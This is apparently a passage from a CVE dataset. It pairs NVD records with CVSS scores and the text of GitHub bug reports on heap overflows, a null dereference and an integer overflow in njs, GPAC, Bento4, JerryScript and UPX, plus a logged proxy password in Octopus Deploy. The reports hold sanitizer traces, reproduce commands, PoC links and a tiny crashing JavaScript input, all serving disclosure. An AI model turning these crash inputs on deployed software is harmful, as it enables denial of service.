#0 0x4dc4e1 in __asan_memcpy (/home/fuzz/Desktop/fuzzproject/njs/build/njs+0x4dc4e1)
#1 0x521ce2 in nxt_vsprintf /home/fuzz/Desktop/fuzzproject/njs/nxt/nxt_sprintf.c:429:15
#2 0x5ada7b in njs_parser_scope_error /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:2365:9
#3 0x5ada7b in njs_parser_lexer_error /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:2395
#4 0x58ab62 in njs_regexp_literal /home/fuzz/Desktop/fuzzproject/njs/njs/njs_regexp.c:364:5
#5 0x5b55fc in njs_parser_terminal /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_terminal.c:106:17
#6 0x5bcd95 in njs_parser_call_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:748:17
#7 0x5bc19b in njs_parser_post_inc_dec_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:689:13
#8 0x5bc19b in njs_parser_inc_dec_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:649
#9 0x5bc19b in njs_parser_unary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:553
#10 0x5bbb9b in njs_parser_exponential_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:476:13
#11 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#12 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#13 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#14 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#15 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#16 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#17 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#18 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#19 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#20 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#21 0x5bafec in njs_parser_conditional_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:352:13
#22 0x5bafec in njs_parser_assignment_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:228
#23 0x5bab67 in njs_parser_binary_expression /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser_expression.c:421:13
#24 0x5af3f1 in njs_parser_statement /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:413:21
#25 0x5a9f04 in njs_parser_statement_chain /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:280:13
#26 0x5b3af6 in njs_parser_block_statement /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:465:17
#27 0x5ae2a2 in njs_parser_statement /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:365:16
#28 0x5a9f04 in njs_parser_statement_chain /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:280:13
#29 0x5a940a in njs_parser /home/fuzz/Desktop/fuzzproject/njs/njs/njs_parser.c:131:17
#30 0x527ae4 in njs_vm_compile /home/fuzz/Desktop/fuzzproject/njs/njs/njs.c:254:11
#31 0x517338 in njs_process_script /home/fuzz/Desktop/fuzzproject/njs/njs/njs_shell.c:780:11
#32 0x516714 in njs_process_file /home/fuzz/Desktop/fuzzproject/njs/njs/njs_shell.c:637:11
#33 0x516714 in LLVMFuzzerTestOneInput /home/fuzz/Desktop/fuzzproject/njs/njs/njs_shell.c:298
#34 0x6046a4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerLoop.cpp:451:13
#35 0x6048d1 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerLoop.cpp:408:3
#36 0x5fab41 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerDriver.cpp:268:6
#37 0x5fda01 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerDriver.cpp:585:9
#38 0x5fa8c0 in main /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerMain.cpp:20:10
#39 0x7f07973cab96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
#40 0x41d769 in _start (/home/fuzz/Desktop/fuzzproject/njs/build/njs+0x41d769)
0x61100000039b is located 0 bytes to the right of 219-byte region [0x6110000002c0,0x61100000039b)
allocated by thread T0 here:
#0 0x4ddaa0 in realloc (/home/fuzz/Desktop/fuzzproject/njs/build/njs+0x4ddaa0)
#1 0x516488 in njs_process_file /home/fuzz/Desktop/fuzzproject/njs/njs/njs_shell.c:569:20
#2 0x516488 in LLVMFuzzerTestOneInput /home/fuzz/Desktop/fuzzproject/njs/njs/njs_shell.c:298
#3 0x6046a4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerLoop.cpp:451:13
#4 0x6048d1 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerLoop.cpp:408:3
#5 0x5fab41 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerDriver.cpp:268:6
#6 0x5fda01 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerDriver.cpp:585:9
#7 0x5fa8c0 in main /home/fuzz/Desktop/libfuzzer-workshop-master/libFuzzer/Fuzzer/./FuzzerMain.cpp:20:10
#8 0x7f07973cab96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/fuzz/Desktop/fuzzproject/njs/build/njs+0x4dc4e1) in __asan_memcpy
Shadow bytes around the buggy address:
0x0c227fff8020: 00 00 00 03 fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00 03 fa fa fa fa
0x0c227fff8050: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c227fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff8070: 00 00 00[03]fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c227fff8090: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa
0x0c227fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c227fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==16711==ABORTING
```
pocfile:https://github.com/xcainiao/poc/blob/master/tmp.js | heap-buffer-overflow in nxt_sprintf.c:429 | https://api.github.com/repos/nginx/njs/issues/174/comments | 3 | 2019-06-03T14:46:39Z | 2019-08-26T16:01:44Z | https://github.com/nginx/njs/issues/174 | 451,525,498 | 174 |
CVE-2019-13618 | 2019-07-16T17:15:12.830 | In GPAC before 0.8.0, isomedia/isom_read.c in libgpac.a has a heap-based buffer over-read, as demonstrated by a crash in gf_m2ts_sync in media_tools/mpegts.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/compare/440d475...6b4ab40"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1250"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8",
"versionEndExcluding": "0.8.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/gpac/gpac/issues/1250 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | hello,I found a heap buffer overflow bug in gpac.
[bug details](http://blog.topsec.com.cn/gpac-heap-buffer-overflow-in-gf_m2ts_sync/)
[heap-over-flow.zip](https://github.com/gpac/gpac/files/3251236/heap-over-flow.zip)
| heap buffer overflow in gf_m2ts_sync | https://api.github.com/repos/gpac/gpac/issues/1250/comments | 1 | 2019-06-04T08:09:07Z | 2019-06-24T15:28:33Z | https://github.com/gpac/gpac/issues/1250 | 451,854,770 | 1,250 |
CVE-2019-13959 | 2019-07-18T19:15:11.520 | In Bento4 1.5.1-627, AP4_DataBuffer::SetDataSize does not handle reallocation failures, leading to a memory copy into a NULL pointer. This is different from CVE-2018-20186. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/394"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*",
"matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/394 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hi, recently when I experience the new version of bento4. I find an NPD bug in program "mp42aac".
`./mp42acc inputs`
The bug logic is that when the data size is not large enough and apply reallocation, the reallocation does not check whether the new buffer is successfully allocated.
This is the execution trace.
4c7a.png">
<img width="1369" alt="image" src="https://user-images.githubusercontent.com/7632714/58330114-c4810880-7e68-11e9-82e1-cc33671c63dc.png">
In SetDataSize, the function realloc buffer when new size is larger than the current one.
This means the two values of two size variable are not zero.
![image](https://user-images.githubusercontent.com/7632714/57675075-76dbf300-7653-11e9-9474-9c774d116266.png)
In reallocation, there is no null pointer check for the return value of the allocation and leads to the crash when apply AP4_CopyMemory which is an alias of memcpy function.
![image](https://user-images.githubusercontent.com/7632714/57675256-02558400-7654-11e9-8aeb-be197543614c.png)
I have uploaded the report and related bug trace to help understand this problem.
[report_input.zip](https://github.com/axiomatic-systems/Bento4/files/3176121/report_input.zip) | Null Pointer Dereference(npd) Bug | https://api.github.com/repos/axiomatic-systems/Bento4/issues/394/comments | 1 | 2019-05-14T06:23:56Z | 2019-08-25T16:30:37Z | https://github.com/axiomatic-systems/Bento4/issues/394 | 443,731,009 | 394 |
CVE-2019-1010176 | 2019-07-25T14:15:11.623 | JerryScript commit 4e58ccf68070671e1fff5cd6673f0c1d5b80b166 is affected by: Buffer Overflow. The impact is: denial of service and possibly arbitrary code execution. The component is: function lit_char_to_utf8_bytes (jerry-core/lit/lit-char-helpers.c:377). The attack vector is: executing crafted javascript code. The fixed version is: after commit 505dace719aebb3308a3af223cfaa985159efae0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/2476"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9175A295-03A6-4FB2-8F80-11BCB454D8A6",
"versionEndExcluding": "2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/jerryscript-project/jerryscript/issues/2476 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | Version:
4e58ccf68070671e1fff5cd6673f0c1d5b80b166
Build command:
`python3 ./tools/build.py --clean --jerry-libc=off --system-allocator=on --profile=es2015-subset --compile-flag=-m32 --compile-flag=-fsanitize=address --strip=OFF`
Testcase:
`cat testcase | ./jerry`
Where testcase is as following:
```
0
/ð/
```
(`300a 2ff0 2f0a` in hex).
Stack trace:
```
==2342==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf580073b at pc 0x080f1a7a bp 0xffbb2b48 sp 0xffbb2b38
WRITE of size 1 at 0xf580073b thread T0
#0 0x80f1a79 in lit_char_to_utf8_bytes jerry-core/lit/lit-char-helpers.c:377
#1 0x811f6d8 in ecma_new_ecma_string_from_utf8_converted_to_cesu8 jerry-core/ecma/base/ecma-helpers-string.c:376
#2 0x811f6d8 in lexer_construct_regexp_object jerry-core/parser/js/js-lexer.c:2175
#3 0x817e286 in parser_parse_unary_expression jerry-core/parser/js/js-parser-expr.c:1116
#4 0x817e286 in parser_parse_expression jerry-core/parser/js/js-parser-expr.c:1858
#5 0x8193a71 in parser_parse_statements jerry-core/parser/js/js-parser-statm.c:2030
#6 0x80effc7 in parser_parse_source.lto_priv.160 jerry-core/parser/js/js-parser.c:2368
#7 0x804d1ef in parser_parse_script jerry-core/parser/js/js-parser.c:2881
#8 0x804d1ef in ecma_op_eval_chars_bufferjerry-core/ecma/operations/ecma-eval.c:101
#9 0x804d1ef in jerry_eval jerry-core/api/jerry.c:551
#10 0x804d1ef in main jerry-main/main-unix.c:814
#11 0xf702e636 in __libc_start_main (/lib32/libc.so.6+0x18636)
#12 0x804f1eb (build/bin/jerry+0x804f1eb)
``` | Heap buffer overflow in lit_char_to_utf8_bytes | https://api.github.com/repos/jerryscript-project/jerryscript/issues/2476/comments | 0 | 2018-08-16T15:19:04Z | 2018-08-21T04:53:56Z | https://github.com/jerryscript-project/jerryscript/issues/2476 | 351,251,936 | 2,476 |
CVE-2019-14268 | 2019-07-25T16:15:13.260 | In Octopus Deploy versions 3.0.19 to 2019.7.2, when a web request proxy is configured, an authenticated user (in certain limited circumstances) could trigger a deployment that writes the web request proxy password to the deployment log in cleartext. This is fixed in 2019.7.3. The fix was back-ported to LTS 2019.6.5 as well as LTS 2019.3.7. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/OctopusDeploy/Issues/issues/5739"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17BFCFB1-B174-4F17-BD8A-D8664AF4B397",
"versionEndExcluding": null,
"versionEndIncluding": "2019.7.2",
"versionStartExcluding": null,
"versionStartIncluding": "3.0.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/OctopusDeploy/Issues/issues/5739 | [
"Third Party Advisory"
] | github.com | [
"OctopusDeploy",
"Issues"
] | Relates to: OctopusDeploy/OctopusDeploy#4112.
# Prerequisites
- [x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/2430143/Security+Disclosure+Policy).
- [x] I have raised a CVE according to our [CVE process](https://octopushq.atlassian.net/wiki/spaces/IN/pages/8290305/Requesting+a+CVE+ID)
- [x] I have written a descriptive issue title
- [x] I have linked the original source of this report
- [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?)
## Description
In certain limited circumstances, the password for a proxy configured via the Octopus Server Manager may be logged in cleartext to the deployment log.
CVE: CVE-2019-14268
## Affected versions
**Octopus Server:** 3.0.19 to 2019.7.3
## Mitigation
Only customers using a proxy which requires authentication are affected. Unfortunately, there are no good mitgations for this.
## Workarounds
Unfortunately, nothing good.
Use of a transparent proxy over ones that require configuration is good practice.
## Source
Source: [Internally reported](https://octopusdeploy.slack.com/archives/C0K9DNQG5/p1534924799000100) | Proxy password may be logged in clear text in certain circumstances | https://api.github.com/repos/OctopusDeploy/Issues/issues/5739/comments | 3 | 2019-07-25T01:42:06Z | 2019-10-24T00:11:58Z | https://github.com/OctopusDeploy/Issues/issues/5739 | 472,623,907 | 5,739 |
CVE-2019-14295 | 2019-07-27T19:15:12.050 | An Integer overflow in the getElfSections function in p_vmlinx.cpp in UPX 3.95 allows remote attackers to cause a denial of service (crash) via a skewed offset larger than the size of the PE section in a UPX packed executable, which triggers an allocation of excessive memory. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/upx/upx/issues/286"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MOCJ43HTM45GZCAQ2FLEBDNBM76V22RG/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T52JATXV6NTPTMGXCRGT37H6KXERYNZN/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:upx_project:upx:3.95:*:*:*:*:*:*:*",
"matchCriteriaId": "7986910F-E5B0-488F-813B-D6B4367F16F4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/upx/upx/issues/286 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"upx",
"upx"
] | <!---
IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE.
Just read it and fill in the details we're asking, it saves so much of our time. Thanks!
-->
## What's the problem (or question)?
<!--- If describing a bug, tell us what happens instead of the expected behavior -->
<!--- If suggesting a change/improvement, explain the difference from current behavior -->
upx.out -l @@ /dev/null
An issue was discovered in upx 3.95, There is a/an Integer-overflow in function
getElfSections at p_vmlinx.cpp:119
In the add operation, the result of (p->sh_size + p->sh_offset) is equal to zero because of overflow.
So the execution can pass the condition check on line 114 and applicate excessive memory line 119,
resulting in denial of service.
## What should have happened?
<!--- If you're describing a bug, tell us what should happen -->
<!--- If you're suggesting a change/improvement, tell us how it should work -->
list compressed file
## Do you have an idea for a solution?
<!--- Not obligatory, but suggest a fix/reason for the bug, -->
<!--- or ideas how to implement the addition or change -->
check for integer overflow correctly
## How can we reproduce the issue?
<!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant -->
upx.out -l @@ /dev/null
the poc is attached [poc](https://github.com/aheroine/libming-bin/raw/master/crashes/upx/poc-Integer-overflow)
### source
```c
file: p_vmlinx.cpp
function: getElfSections()
104 template <class T>
105 typename T::Shdr const *PackVmlinuxBase<T>::getElfSections()
106 {
107 Shdr const *p, *shstrsec=0;
108 shdri = new Shdr[(unsigned) ehdri.e_shnum];
109 fi->seek(ehdri.e_shoff, SEEK_SET);
110 fi->readx(shdri, ehdri.e_shnum * sizeof(*shdri));
111 int j;
112 for (p = shdri, j= ehdri.e_shnum; --j>=0; ++p) {
113 if (Shdr::SHT_STRTAB==p->sh_type
114 && (p->sh_size + p->sh_offset) <= (unsigned long)file_size
115 && p->sh_name < p->sh_size
116 && (10+ p->sh_name) <= p->sh_size // 1+ strlen(".shstrtab")
117 ) {
118 delete [] shstrtab;
119 shstrtab = new char[1+ p->sh_size];
120 fi->seek(p->sh_offset, SEEK_SET);
121 fi->readx(shstrtab, p->sh_size);
122 shstrtab[p->sh_size] = '\0';
123 if (0==strcmp(".shstrtab", shstrtab + p->sh_name)) {
124 shstrsec = p;
125 break;
126 }
127 }
128 }
129 return shstrsec;
130 }
```
### debug
```c
(gdb) p (unsigned long long)p->sh_size + (unsigned long long)p->sh_offset
$4 = 0
(gdb) p (unsigned long long)p->sh_size
$5 = 576460752303423488
(gdb) p (unsigned long long)p->sh_offset
$6 = 17870283321406128128
(gdb) p p->sh_size
$7 = {d = "\000\000\000\000\000\000\000\b"}
(gdb) p p->sh_offset
$8 = {d = "\000\000\000\000\000\000", <incomplete sequence \370>}
(gdb) x/gx &p->sh_size
0x61c00000ff20: 0x0800000000000000
(gdb) x/gx &p->sh_offset
0x61c00000ff18: 0xf800000000000000
```
### bug report
```txt
=================================================================
==6768==WARNING: AddressSanitizer failed to allocate 0x800000000000001 bytes
==6768==AddressSanitizer's allocator is terminating the process instead of returning 0
==6768==If you don't like this behavior set allocator_may_return_null=1
==6768==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0)
#0 0x7f935b1a2631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631)
#1 0x7f935b1a75e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3)
#2 0x7f935b11f425 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x1d425)
#3 0x7f935b1a5865 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa3865)
#4 0x7f935b124b4d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22b4d)
#5 0x7f935b19b67e in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9967e)
#6 0x6f73e2 in PackVmlinuxBase<N_Elf::ElfClass_64<N_BELE_CTP::LEPolicy> >::getElfSections() /home/jl/work/projects/upx/upx/src/p_vmlinx.cpp:119
#7 0x70949a in PackVmlinuxBase<N_Elf::ElfClass_64<N_BELE_CTP::LEPolicy> >::canUnpack() /home/jl/work/projects/upx/upx/src/p_vmlinx.cpp:569
#8 0x7a7e1d in try_unpack /home/jl/work/projects/upx/upx/src/packmast.cpp:114
#9 0x7abe70 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/jl/work/projects/upx/upx/src/packmast.cpp:177
#10 0x7b5282 in PackMaster::getUnpacker(InputFile*) /home/jl/work/projects/upx/upx/src/packmast.cpp:248
#11 0x7b694b in PackMaster::list() /home/jl/work/projects/upx/upx/src/packmast.cpp:279
#12 0x8604db in do_one_file(char const*, char*) /home/jl/work/projects/upx/upx/src/work.cpp:164
